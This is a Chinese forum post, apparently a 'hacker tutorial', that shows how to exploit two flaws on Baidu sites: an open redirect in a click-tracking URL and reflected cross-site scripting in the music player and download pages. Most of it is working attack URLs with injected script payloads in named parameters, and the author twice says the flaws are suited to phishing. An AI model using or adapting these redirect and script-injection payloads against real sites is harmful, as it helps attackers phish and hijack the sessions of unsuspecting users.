黑客教程-百度的两个小漏洞
教程说明:大家好,我是qswsqsw,今天的教程是:百度2个小漏洞,一个页面转向的问题,还有1个是跨站。
首先是页面转向,http://utility.baidu.com/traf/click.php?id=1208&url=http%3A%2F%2F2008.baidu.com%2F
就这个,看到url的参数了吗?我们修改下‘
http://utility.baidu.com/traf/click.php?id=1208&url=http%3A%2F%2Fwww.163.com%2F
到达163了,这个漏洞适合于钓鱼
下个是跨站,和上次的新浪音乐跨站差不多,我们来看下吧
还是音乐板块,找歌,然后视听,复制其地址看看
http://box.zhangmen.baidu.com/m?gate=1&ct=134217728&tn=baidumt,反方向的钟&word=wma,http://61.151.247.194/expert/voice/upload/pZemqGc2.wma,,[反方向的钟]&si=反方向的钟;;周杰伦;;39956;;39956&lm=16777216
把所有url加密的解开。%20%20是空格,不管,就成这个样子了,然后我们来提交信息,
http://box.zhangmen.baidu.com/m?gate=1&ct=134217728&tn=baidumt,<script>alert(/标题1/)</script>&word=wma,http://61.151.247.194/expert/voice/upload/pZemqGc2.wma,,[<script>alert(/标题2/)</script>]&si=<script>alert(/标题3/)</script>;;<script>alert(/歌手/)</script>;;39956;;39956&lm=16777216
能跨站的只有标题3,我们看下代码,标题2没有显示完,其他的没出现在代码上,然后还有个地方,那就是歌曲地址,我们来看
http://61.151.247.194/expert/voice/upload/pZemqGc2.wma
而实际地址却是http://61.151.247.194/expert/voice/upload/test2.wma
看到了么,最后的地址不一样 但是前面一样,那么我用这个跨站试试
http://box.zhangmen.baidu.com/m?gate=1&ct=134217728&tn=baidumt,反方向的钟&word=wma,<script>alert(/地址/)</script>/pZemqGc2.wma,,[反方向的钟]&si=反方向的钟;;周杰伦;;39956;;39956&lm=16777216
OK,跨起了,然后我们再来看下下载
http://220.181.38.82/m?ct=134217728&tn=baidusg,反方向的钟%20%20&word=wma,<script>alert(/地址/)</script>/pZemqGc2.wma,,[<script>alert(/标题2/)</script>]&si=<script>alert(/标题3/)</script>;;<script>alert(/歌手/)</script>;;39956;;39956&lm=16777216
我们还是那样替换
没有反应 我们看下代码,只有题目1 而且显示不完,看样子只能地址了,那么我们提交地址吧,和上面的方法一样
OK,再看下其他的呢,我也没看过呢
没有了,就这个,还是适合钓鱼,那么教程结束了。
教程下载地址:
[size=6][color=red][url=http://ishare.iask.sina.com.cn/cgi-bin/fileid.cgi?fileid=3581137][size=6][color=red]点击此处下载[/color][/size][/url][/color][/size]
页:
[1]